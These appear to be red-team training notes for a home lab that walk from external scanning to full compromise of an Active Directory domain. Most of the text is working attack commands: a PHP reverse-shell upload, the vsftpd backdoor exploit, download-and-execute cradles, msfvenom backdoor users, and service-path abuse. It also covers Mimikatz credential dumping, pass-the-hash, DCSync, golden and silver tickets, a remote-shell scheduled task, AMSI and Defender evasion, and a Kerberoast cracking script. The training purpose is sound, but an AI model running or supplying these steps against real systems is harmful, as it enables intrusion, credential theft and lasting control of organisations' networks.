** Intro
* Find-PSRemotingAdminAccess.ps1
* Find-PSServiceAccounts.ps1
* Find-WMILocalAdminAccess.ps1
* Invoke-Mimikatz.ps1
* PowerUp.ps1
* PowerView_dev.ps1
* tgsrepcrack.py
* 10k-most-pass.txt
* Python
** Red Team Lab Setup
External Red Team Lab Setup (VirtualBox)
- Kali Linux
  VLAN 1 : 192.168.50.0/24
  Kali IP : 192.168.50.2
- Metasploitable 2 (dual-homed: one leg on the external VLAN, one on the internal VLAN, so it is the pivot host)
  IP 1 : 192.168.50.3
  IP 2 : 10.10.10.5
Internal Red Team Lab Setup
VLAN 2 : 10.10.10.0/24
- Domain Controller
  IP : 10.10.10.2
- App Server
  IP : 10.10.10.3
- Employee workstation (Computer User)
  IP : 10.10.10.4
** Red Teaming in External Environment
External Red Team Operations
Reconnaissance
- - Active Reconnaissance
- - Passive Reconnaissance
Scanning & Enumeration
- Host Discovery
NetDiscover
NetDiscover is a very neat tool for finding hosts on either wireless or switched
networks. It works with ARP, so it only sees hosts on the local segment.
netdiscover -i [interface] -r [IP range in CIDR format]
Example : netdiscover -r 10.10.10.0/24
Nmap
-sn : ping scan (host discovery only, no port scan; it takes no port argument)
Command : nmap -sn [IP or CIDR range]
- TCP Port Scanning
- - TCP Full Scan (connect scan, -sT; completes the handshake, works without root)
- - TCP SYN Scan (Stealth Scan, -sS; half-open, needs raw sockets / root)
- - TCP ACK Scan (-sA; maps firewall rules, does not tell open from closed)
- - TCP FIN/NULL/Xmas Scan (-sF / -sN / -sX; Xmas sets FIN, PSH and URG)
- Service version Detection
Command : nmap -p 22 -sV [IP]
- OS detection
Command : nmap -O [IP]
- UDP Port Scanning
Command : nmap -sU -p 53,161 [IP]
Vulnerability Assessment
• Vulnerability assessment is a systematic review of security weaknesses in an information system.
• It evaluates whether the system is susceptible to any known vulnerabilities, assigns severity levels to those vulnerabilities, and recommends remediation or mitigation where needed.
• It follows a 4-step process :
1. Vuln Identification
2. Analysis
3. Risk Assessment
4. Remediation
Vulnerability Assessment Tools
- Nessus
- Acunetix
- Qualys Vulnerability Management
- Netsparker
- Metasploit
- Amazon Inspector (ONLY for applications deployed on AWS)
- Nikto (for web application)
- nmap (for both Network as well as web app)
DEMO
nmap -p 21 -sV 192.168.50.3
nmap --script-help 'ftp-*'
nmap --script ftp-vsftpd-backdoor -p 21 192.168.50.3
External Red Team Operations Part 2
Web-Based
DEMO
Test the web server by hand with netcat and ask which HTTP methods are allowed:
nc [ip] [port]
OPTIONS http://[IP] HTTP/1.0
host:[IP]
The same check can be done for a specific path, e.g.:
OPTIONS http://192.168.50.3/dev HTTP/1.0
host:192.168.50.3
Once you have seen which methods are allowed (PUT is the interesting one), use cadaver, a WebDAV client:
cadaver http://192.168.50.3/dev
Edit the web shell and set the attacker IP and port to your Kali listener:
nano /usr/share/webshells/php/php-reverse-shell.php
Upload the web shell (rename it, e.g. to shell.php):
cadaver http://192.168.50.3/dev
put /usr/share/webshells/php/php-reverse-shell.php
After the put, shell.php is in the /dev directory on the server.
Start the listener before triggering the shell:
nc -nlvp [the port set in shell.php]
Trigger it: open the site in the browser, go to /dev and click shell.php.
If it worked, the listener terminal gets a connection:
whoami            # which user we are running as
/sbin/ifconfig    # which interfaces / IPs the host has
cat /etc/passwd   # list of local accounts (password hashes are in /etc/shadow, not here)
Network Exploitation
* A network is a connection of more than one system so that they can communicate with each other; there can be many systems on a single network.
* Network exploitation means abusing network-level functionality.
* Identifying open ports and the services behind them, and specifically their versions, is important before exploiting any system.
* The main motive of the attacker is to gain access to sensitive information such as passwords, classified files and bank account details present in the information system.
* We will try to find vulnerabilities in the target system in order to secure the network.
* We will automate the typical exploitation process using Metasploit.
DEMO
msfconsole
search vsftpd
use 0    (or: use exploit/unix/ftp/vsftpd_234_backdoor)
show options, then fill in what is required, e.g. set RHOSTS 192.168.50.3 and set verbose true
run
whoami    # which user we are running as
ifconfig  # which IPs the host has
python -c "import pty;pty.spawn('/bin/bash')"   # upgrade to a pty so the shell shows a # or $ prompt like on Kali (works in the web shell too)
Post-Exploitation
* The goal is to maintain a foothold on the compromised system after successful exploitation.
* After the cumbersome effort of enumerating the target, finding vulnerabilities and exploiting the weak links, we need persistence.
* Various persistence methods exist depending on the nature of the target system.
* Methods :
- - User land persistence
- - Kernel land persistence (out of scope for this course)
- - Boot-level persistence (out of scope for this course)
* Of course, kernel land persistence is very hard to detect and generally requires deep analysis to find.
* Attackers can still fool the victim by persisting in user land; we will soon look at various ways to achieve persistence on the victim machine.
** Network Pivoting
DEMO
Once we have SSH access to the dual-homed host:
ssh msfadmin@192.168.50.3
Check what sudo allows:
sudo -l
Open a dynamic (SOCKS) port forward through the host; OpenSSH's -D listener speaks SOCKS4 and SOCKS5:
ssh -D 8090 msfadmin@192.168.50.3
Check on Kali that the SOCKS listener is up:
netstat -ant | grep 8090
Add the proxy to proxychains:
nano /etc/proxychains.conf
add under [ProxyList]:
socks4 127.0.0.1 8090
From the SSH session, find which internal IPs the host talks to (ifconfig, netstat, arp). Once you know the target IP:
proxychains nc -nv 10.10.10.4 [PORT]
Example: proxychains nc -nv 10.10.10.4 445   # checks whether the port is open through the pivot (SOCKS carries TCP only)
Look for credentials on the SSH host. In this lab they are in vnc.log: Username: cyberwarfare\employee  Password: Password@963
RDP to the target with the credentials found:
proxychains rdesktop 10.10.10.4
and enter the credentials.
** Red Teaming Internal Environment
1. Introduction
Internal Infrastructure Overview
[Topology diagram]
Infrastructure Enumeration
* Here we focus on mapping the network devices and hosts present in the internal environment.
* Attackers leverage built-in tools to enumerate and map live hosts in the environment.
* Since the internal network is mostly an Active Directory environment, we focus on abusing misconfigurations.
* Tools like
* Below is a PowerShell one-liner that scans TCP ports 1-1024 on one host. It is a connect scan: Connect() throws on a closed port and the error is sent to $null, so only open ports print.
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.100",$_)) "Port $_ is open!"} 2>$null
* The command below scans hosts 10.1.1.1-5 for a few common TCP ports (the loop variable must match the address it builds).
1..5 | % { $a = $_; write-host "------"; write-host "10.1.1.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$a",$_)) "Port $_ is open!"} 2>$null}
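The two one-liners above are TCP connect scans. What follows is an added example (my code, not from the course or from any tool it lists) of the same technique in Python, with a per-port timeout, a thread pool, and a multi-host helper that mirrors the 10.1.1.1-5 loop. The listener it scans is a constructed local fixture so the block runs offline; the function names (scan_ports, scan_hosts, start_test_listener) are mine.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def tcp_connect(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a full TCP handshake to host:port succeeds.

    Same technique as the Net.Sockets.TcpClient.Connect() one-liner: a complete
    connect, so no privileges are needed, but the target sees an accepted
    connection (and can log it), unlike a half-open SYN scan.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:          # refused, timed out, unreachable
            return False


def scan_ports(host: str, ports, workers: int = 64, timeout: float = 0.5) -> list:
    """Connect-scan `ports` on `host` in parallel; returns the open ports sorted."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, tcp_connect(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def scan_hosts(hosts, ports, **kw) -> dict:
    """Same port list against several hosts, like the 10.1.1.1-5 loop above."""
    return {h: scan_ports(h, ports, **kw) for h in hosts}


def start_test_listener(host: str = "127.0.0.1"):
    """Constructed fixture (not a real target): an ephemeral TCP listener so the
    scan has exactly one known-open port. Returns (port, stop_function)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)
    srv.settimeout(0.2)          # lets the accept loop notice the stop flag
    stop = threading.Event()

    def accept_loop():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
                conn.close()
            except socket.timeout:
                continue
            except OSError:
                break
        srv.close()

    t = threading.Thread(target=accept_loop, daemon=True)
    t.start()

    def stop_listener():
        stop.set()
        t.join()

    return srv.getsockname()[1], stop_listener


if __name__ == "__main__":
    port, stop = start_test_listener()
    window = range(port - 5, port + 6)
    print(f"open on 127.0.0.1 in {window.start}-{window.stop - 1}:",
          scan_ports("127.0.0.1", window))
    stop()
```

Like the PowerShell version this completes the handshake, so every probe is an accepted connection on the target. A SYN scan (nmap -sS) needs raw sockets and root, which a low-privilege foothold usually does not have; that is why the connect approach is the one used from a compromised workstation, and why a defender sees it as ordinary connection attempts from an internal host.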
Active Directory Essentials
* In the lab we have 3 machines set up in a domain environment.
* Windows PowerShell and native Windows executables can be used for enumeration and exploitation.
* In-scope IP address range :
- - 10.10.10.2 Domain Controller
- - 10.10.10.3 Application Server
- - 10.10.10.4 Employee System
PowerShell
* PowerShell is a .NET-based shell and scripting engine that comes installed by default on all supported Windows versions.
* Binaries and scripts can be executed completely in memory using PowerShell.
* PowerShell can administer a network and provides access to manage the Active Directory environment.
* Useful for lateral movement scenarios :
- - PowerShell Remoting
- - Web-Based PowerShell Remoting
* Scripts with extension "*.ps1", "*.psm1", "*.psd1" etc. can be loaded into the current PowerShell session as follows :
Import-Module <Module_Name.ps1>
* A script can also be loaded by "dot sourcing" it, which runs it in the current scope so its functions stay defined :
. .\<Script_Name>.ps1
Execution policy bypass (the execution policy is not a security boundary, it only prevents accidental script execution) :
powershell -ep bypass
Select a property from the output :
Get-NetUser | Select-Object givenname
Download cradles (fetch a script over HTTP and run it in memory, nothing touches disk) :
iex (iwr 'http://192.168.2.2/file.ps1')
$down = [System.NET.WebRequest]::Create("http://192.168.2.2/file.ps1")
$read = $down.GetResponse()
IEX ([System.IO.StreamReader]($read.GetResponseStream())).ReadToEnd()
$file=New-Object -ComObject Msxml2.XMLHTTP;$file.open('GET','http://192.168.2.2/file.ps1',$false);$file.send();iex $file.responseText
iex (New-Object Net.WebClient).DownloadString('https://192.168.2.2/reverse.ps1')
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.2.2/reverse.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
Active Directory Phases Exploitation
[Diagram]
* We already have access to the internal environment.
* Credentials of a user were found on the web server, which gave us access to the employee machine.
* Built-in functionality like PowerShell and WMI can be used for situational awareness in the network.
* An adversary always heads in the direction of the company's critical assets.
* We use PowerView for enumeration.
* Get current domain :
Get-NetDomain
Get-NetDomain -Domain cyberwarfare.corp
* Retrieve the domain SID and the Domain Controller :
Get-DomainSID
Get-NetDomainController -Domain cyberwarfare.corp
* Retrieve a list of users in the current domain :
Get-NetUser
Get-NetUser -UserName emp1
* Retrieve a list of computers in the current domain :
Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer -OperatingSystem "Windows Server 2016 Standard"
* List all domain groups in the current domain :
Get-NetGroup
Get-NetGroup -FullData
Get-NetGroup -Domain cyberwarfare.corp
* Enumerate privileged domain group members and local administrators group members :
Get-NetGroupMember -GroupName "Domain Admins" -Verbose     (older PowerView)
Get-NetGroupMember -Identity "Domain Admins" -Verbose      (PowerView_dev)
Get-NetLocalGroup -ComputerName DC-01 -ListGroups
* ACL Enumeration, get the ACLs associated with an entity :
Get-ObjectAcl -SamAccountName <Domain_User> -ResolveGUIDs
* Unique and interesting ACL scanning (ACEs held by non-default principals) :
Invoke-ACLScanner -ResolveGUIDs -Verbose
* Enumerate Domain Trusts :
Get-NetDomainTrust
Get-NetDomainTrust -Domain cyberwarfare.corp
* Enumerate all domains in a Forest :
Get-NetForest -Verbose
Get-NetForestDomain -Verbose
* Find computers where the current user has local admin access :
Find-LocalAdminAccess -Verbose
2. Privilege Escalation
* An adversary tries to escalate privileges from low to high (Administrator, root).
* There are various weaknesses that can be abused in Windows/Linux environments (MITRE ATT&CK technique IDs) :
- - Abuse Elevation Control Mechanism [T1548]
- - Access Token Manipulation [T1134]
- - Boot or Logon Auto-start Execution [T1547]
- - Boot or Logon Initialization Scripts [T1037]
- - Create or Modify System Process [T1543]
- - Event Triggered Execution [T1546]
- - Exploitation for Privilege Escalation [T1068]
- - Process Injection [T1055]
- - Scheduled Task/Job [T1053]
- - Valid Accounts [T1078]
* PowerUp can be used to escalate locally in a Windows environment.
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Import-Module .\PowerUp.ps1   OR   . .\PowerUp.ps1
If the script is blocked by the execution policy, start a new shell first :
powershell -ep bypass
Invoke-AllChecks -Verbose
* List services whose configuration the current user can modify :
Get-ModifiableService -Verbose
* Unquoted Service Path :
Get-ServiceUnquoted -Verbose
Build the backdoor binary on Kali (it creates a local admin user when executed) :
msfvenom -p windows/adduser USER=backdoor_admin PASS=admin1234 -f exe > service.exe
Serve the file from Kali over HTTP so it can be downloaded on Windows :
sudo python -m SimpleHTTPServer 80     (python3 : sudo python3 -m http.server 80)
On Windows, browse to the Kali IP and download the file.
Place it in the root of Local Disk C: renamed to Program.exe. For an unquoted service path such as C:\Program Files\...\service.exe Windows tries C:\Program.exe first, so the service runs our binary.
After a reboot the service should have run it and created the new user backdoor_admin.
Abusing a service with a modifiable configuration (snmptrap) instead :
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks -Verbose
Check the service configuration :
sc.exe qc snmptrap
Change the binary path so the service adds our user to the local Administrators group (sc.exe needs the space after binpath=) :
sc.exe config snmptrap binpath= "net localgroup administrators cyberwarfare\employee /add"
Check the difference :
sc.exe qc snmptrap
Restart the service so the new command runs (the start "fails" because net.exe is not a service, but the command has already executed as SYSTEM) :
Restart-Service snmptrap -Verbose
Check in cmd whether cyberwarfare\employee is now in the local Administrators group :
net localgroup administrators
If so, open an administrator PowerShell; if that does not work yet, sign out and back in first, since the new group membership is only in a fresh logon token.
3. Credential Dumping
* With enough privileges on the local machine, the adversary dumps credentials from memory and looks for machines where admin users are logged on. Technique example : Credential Dumping.
* Service accounts generally have administrator privileges on a machine.
* Well-known attacks like Kerberoasting can be used to brute-force service account credentials offline.
* We need to find machines where a high-privilege domain user like a Domain Admin has a session; this can be done with the PowerView "Invoke-UserHunter" query.
DEMO
https://github.com/PowershellMafia/Powersploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
powershell -ep bypass
Dot-source the script to load it :
. .\Invoke-Mimikatz.ps1
whoami
Invoke-Mimikatz -DumpCreds -Verbose
Pass-the-hash with the NTLM (RC4) hash of a dumped account; it opens a new PowerShell running with that identity :
Invoke-Mimikatz -Command '"sekurlsa::pth /user:emp_svc /domain:cyberwarfare.corp /rc4:<hash> /run:powershell.exe"'
OR
Invoke-Mimikatz -Command '"sekurlsa::pth /user:emp_svc /domain:cyberwarfare.corp /rc4:<hash> /run:powershell.exe"' -Verbose
In the new PowerShell window, find machines where emp_svc is a local admin :
cd C:\Users\employee\Downloads\
powershell -ep bypass
. .\Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess -Verbose
4. Lateral Movement
* The adversary tries to move laterally in the environment in search of critical servers/assets.
* Some of the techniques that can be used are :
- - PowerShell Remoting
- - Windows Management Instrumentation (WMI)
- - Invoke-Mimikatz.ps1 etc.
* It is advised to choose a method which is stealthy and leaves almost no footprint on ANY machine the adversary is targeting.
PowerShell Remoting
* It uses the WinRM protocol and runs by default on TCP ports 5985 (HTTP) and 5986 (HTTPS).
* It is the recommended way to manage Windows Server Core machines.
* It is enabled by default from Windows Server 2012 onwards.
* Adversaries use it to connect to remote computers/servers and execute commands once they have the required privileges (by default local admin on the target).
* Example cmdlets : Invoke-Command, New-PSSession, Enter-PSSession
* Configuration is easy : "Enable-PSRemoting -SkipNetworkProfileCheck -Verbose -Force" as administrator
* It is used to run commands and scripts on :
- - Windows servers/workstations
- - Linux machines too (PowerShell is an open-source project)
* Example commands :
1. $session = New-PSSession -ComputerName Windows-Server -Verbose
2. Invoke-Command -Session $session -ScriptBlock {whoami;hostname} -Verbose    (or ipconfig)
3. Enter-PSSession -Session $session -Verbose
Invoke-Mimikatz
* Used for dumping credentials, Kerberos tickets etc., all in memory.
* Run with administrative privileges for credential dumping operations.
* Ex : (As Administrator)
Invoke-Mimikatz -DumpCreds -Verbose
* Dump on remote machines over PowerShell Remoting :
Invoke-Mimikatz -DumpCreds -ComputerName @("comp1","comp2")
* The most famous one, pass-the-hash :
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:cyberwarfare.corp /ntlm:<NTLM hash of the primary account> /run:powershell.exe"' -Verbose
DEMO
$session = New-PSSession -ComputerName app-Server -Verbose
$session
Invoke-Command -Session $session -ScriptBlock {whoami;ipconfig} -Verbose
Enter-PSSession -Session $session -Verbose
whoami
hostname
ipconfig
net user
klist
exit
powershell -ep bypass
. .\Invoke-Mimikatz.ps1
If loading fails, disable Windows real-time protection (lab shortcut only; on a real engagement an obfuscated / AMSI-evaded build is used instead)
Invoke-Mimikatz
Invoke-Mimikatz -ComputerName app-server -Verbose
net user [primary username] /domain
5. Exploitation (Unconstrained Delegation)
* On a server with unconstrained delegation, the TGT of every user who authenticates to it is cached in LSASS. An adversary can export that TGT and access any other resource as that user. Now imagine the consequences when we get the TGT of a Domain Admin.
* List computers having Unconstrained Delegation enabled :
Get-NetComputer -Unconstrained -Verbose
* The adversary compromises the server where unconstrained delegation is enabled.
* Using social engineering, an adversary can trick the domain admin or any privileged user into connecting to the already compromised server.
* Extract the Domain Admin TGT :
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
* Re-use the ticket to perform other operations as Domain Admin :
Invoke-Mimikatz -Command '"kerberos::ptt <exported ticket>.kirbi"'
* Run a DCSync attack :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
DEMO
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:app-svc /domain:cyberwarfare.corp /ntlm:<NTLM hash of the primary account> /run:powershell.exe"' -Verbose
In the new PowerShell window :
powershell -ep bypass
. .\PowerView_dev.ps1
Invoke-CheckLocalAdminAccess -ComputerName dc01 -Verbose
If dc01 returns False, check the real DC name first :
Invoke-CheckLocalAdminAccess -Verbose
Get-NetDomainController -Verbose
Check the Name field, then :
Invoke-CheckLocalAdminAccess -ComputerName DC-01.cyberwarfare.corp -Verbose
$sess = New-PSSession -ComputerName DC-01.cyberwarfare.corp -Verbose
Invoke-Command -Session $sess -ScriptBlock {ipconfig;hostname} -Verbose
Enter-PSSession -Session $sess -Verbose
whoami
6. Kerberoasting
* We send the required details to the DC to get a valid TGT; the TGT is then used to get a TGS (service ticket, for authorization) for a specific service.
* The TGS is encrypted with the target service account's password hash, so one can export it and brute-force it offline against a password dictionary. Any domain user can request a TGS for any SPN, no privileges needed.
* Administrators generally do not rotate the credentials of non-machine service accounts (they are often old, weak and over-privileged), so we frequently end up with clear-text credentials ☺
* In short, it is offline brute-forcing of service account credentials: after the single ticket request, no further traffic to the DC is needed, so there is nothing for the DC to log.
[Diagram]
* Find user accounts which are used as service accounts (accounts with an SPN set) :
Get-NetUser -SPN
setspn -T cyberwarfare.corp -Q */*
* Request the TGS, aka service ticket (tools ask for the RC4-encrypted ticket, etype 23, because it cracks far faster than AES) :
Request-SPNTicket
Or with .NET only, no PowerView needed :
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/portal.cyberwarfare.corp"
* Check the ticket is in memory :
klist
* Export the ticket using Mimikatz :
Invoke-Mimikatz -Command '"kerberos::list /export"' -Verbose
* Copy the exported .kirbi to Kali and crack the service account password with tgsrepcrack.py :
python tgsrepcrack.py 10k-worst-pass.txt <exported .kirbi>
Or, on Windows with Python installed :
python.exe .\tgsrepcrack.py .\passwords.txt '.\Ticket.kirbi'
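What tgsrepcrack.py and hashcat do with the exported ticket, as an added example (my code, not the course's and not tgsrepcrack.py itself): the RC4-HMAC (etype 23) scheme from RFC 4757 derives the key as the NT hash of the candidate password, and a candidate is correct when the ticket's 16-byte checksum verifies after decryption. Because hashlib's md4 is missing on many OpenSSL 3 systems the block carries its own MD4. The sample ticket is constructed here by encrypting a fake EncTicketPart under a known weak password; a real run would take the enc-part out of the .kirbi exported above. The account name, realm, SPN and function names (crack_tgs, hashcat_line) are mine.

```python
import hashlib
import hmac
import os
import struct

KEY_USAGE_TICKET = 2   # RFC 4120 key usage for a ticket's enc-part, which is what a TGS carries


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = ((F, range(16), (3, 7, 11, 19), 0),
              (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
              (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """RC4-HMAC (etype 23) key = NT hash = MD4(UTF-16LE(password)), per RFC 4757."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = KEY_USAGE_TICKET) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); data = confounder || plaintext; checksum = HMAC(K1, data);
    K3 = HMAC(K1, checksum); output = checksum || RC4(K3, data). Used here only to build the sample."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = os.urandom(8) + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_check(key: bytes, ciphertext: bytes, usage: int = KEY_USAGE_TICKET) -> bool:
    """Decrypt with a candidate key and verify the checksum; a match proves the key.
    This is the per-candidate test behind hashcat mode 13100."""
    checksum, edata = ciphertext[:16], ciphertext[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, data), checksum)


def crack_tgs(ciphertext: bytes, wordlist):
    """Offline brute force: one MD4, two HMAC-MD5 and one RC4 per candidate, no DC traffic."""
    for word in wordlist:
        if rc4_hmac_check(nt_hash(word), ciphertext):
            return word
    return None


def hashcat_line(user: str, realm: str, spn: str, ciphertext: bytes) -> str:
    """The same enc-part in the $krb5tgs$23$ format that hashcat -m 13100 expects."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${ciphertext[:16].hex()}${ciphertext[16:].hex()}"


if __name__ == "__main__":
    # Constructed sample: a fake EncTicketPart (ASN.1 tag 0x63) under a weak service-account password.
    sample = rc4_hmac_encrypt(nt_hash("Password1"), b"\x63\x82" + b"fake EncTicketPart" * 3)
    print(hashcat_line("emp_svc", "CYBERWARFARE.CORP", "HTTP/portal.cyberwarfare.corp", sample))
    print("cracked:", crack_tgs(sample, ["letmein", "Summer2020", "Password1"]))
```

Pure-Python MD4 and RC4 manage a few thousand candidates per second, which is enough to see the mechanism but not to crack a real wordlist; convert the ticket with hashcat_line and use hashcat -m 13100 for that. Tickets encrypted with AES (etype 17/18) use a PBKDF2-based key derivation that is thousands of times slower per guess, which is why forcing RC4 on service accounts (or leaving RC4 enabled) matters to both sides.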
7. Forging Golden and Silver Tickets
* Once critical assets are identified with enough privileges, adversaries try to establish long-term persistence and exfiltrate data stealthily.
* For data exfiltration an adversary can use various protocols to stay under the radar.
* Some data exfiltration techniques :
- - Automated Exfiltration [T1020]
- - Exfiltration Over Alternative Protocol [T1048]
- - Exfiltration Over Physical Medium [T1052]
- - Transfer Data to Cloud Account [T1537]
Golden Ticket
*  A golden ticket is a forged TGT, signed and encrypted with the "krbtgt" account hash.
* With the krbtgt account hash any user with any privileges can be impersonated, and the forged ticket keeps working until the krbtgt password has been changed twice.
* Requirements :
- - Domain SID
- - krbtgt hash
- - Domain name
- - extra SIDs (in cross-forest / child-to-parent attacks)
* Extract the krbtgt account hash (DCSync, needs replication rights, e.g. Domain Admin) :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
* Domain SID :
whoami /all (of a domain user; the domain SID is the user SID without its last component, the RID)
* Forge a golden ticket in the domain as follows :
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxx-yyyyy-xxxxx /krbtgt:xxxxxxxxxxxxxxxxxx /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Silver Ticket
* A silver ticket is a forged TGS, signed and encrypted with the target service account hash (for services running as the machine, the machine account hash).
* It represents a valid TGS (for authorization) for one service on one host; the DC is never contacted, so nothing is logged there.
* Requirements :
- - Domain SID
- - Service account / machine account hash
- - Domain name
- - extra SIDs (in cross-forest attacks)
DCSync
* To extract domain user / service account / machine account credentials without code execution on the Domain Controller, the adversary uses the DCSync attack: it asks the DC to replicate the secrets exactly as another DC would.
* A specific set of privileges is required to retrieve hashes remotely without code execution (Domain Admins, Enterprise Admins and Domain Controllers have them by default) :
- - Replicating Directory Changes (DS-Replication-Get-Changes)
- - Replicating Directory Changes All (DS-Replication-Get-Changes-All)
- - Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set)
Command :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
* Extract the DC machine account hash (the key for a silver ticket against services on the DC) :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\dc-01$"'
* Domain SID :
whoami /all (of a domain user; drop the trailing RID)
* Forge a silver ticket for the CIFS service on the DC (same kerberos::golden module; /target and /service make it a service ticket) :
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-yyyyyyyy-zzzzzzzzzz-xxxxxx /target:enterprise-dc.cyberwarfare.corp /service:cifs /rc4:<HASH> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
* Adversaries create a silver ticket for the HOST service, which lets them schedule a malicious task on the target :
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxxx-yyyy-zzzzz /target:enterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxxxx /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
DEMO
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\DC-01$"' -Verbose
whoami
ls \\DC-01\c$
If this gives Access denied, get the domain SID :
whoami /all
powershell -ep bypass
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:<domain SID: the user SID from whoami /all without its last -RID component> /target:DC-01.cyberwarfare.corp /service:cifs /rc4:<NTLM hash of DC-01$> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' -Verbose
klist
ls \\DC-01.cyberwarfare.corp\c$
8. Persistence
* Schedule and execute a task on a remote server (the task name given to /create and /Run must match) :
schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.1:8000/InvokePowerShellTcp.ps1''')'"
schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "STCheck"
DEMO
Enter-PSSession -Session $sess -Verbose
$sess
whoami
exit
$sess
. .\Invoke-Mimikatz.ps1
Load the script into the remote session (it runs in memory on the DC) :
Invoke-Command -Session $sess -FilePath .\Invoke-Mimikatz.ps1 -Verbose
Enter-PSSession -Session $sess
If AMSI blocks the script: browse to amsi.fail, copy a bypass, paste it into the remote session, then load the script again :
exit
Invoke-Command -Session $sess -FilePath .\Invoke-Mimikatz.ps1 -Verbose
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
whoami
Back on the local machine :
. .\Invoke-Mimikatz.ps1
whoami /all
. .\PowerView_dev.ps1
Get-DomainSID -Verbose
Write the golden ticket to a file (to keep for later) :
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:<domain SID, the whoami /all SID without its trailing RID> /krbtgt:<NTLM hash of krbtgt> /startoffset:0 /endin:600 /renewmax:10080 /ticket:identity.kirbi"' -Verbose
OR inject it straight into the current session :
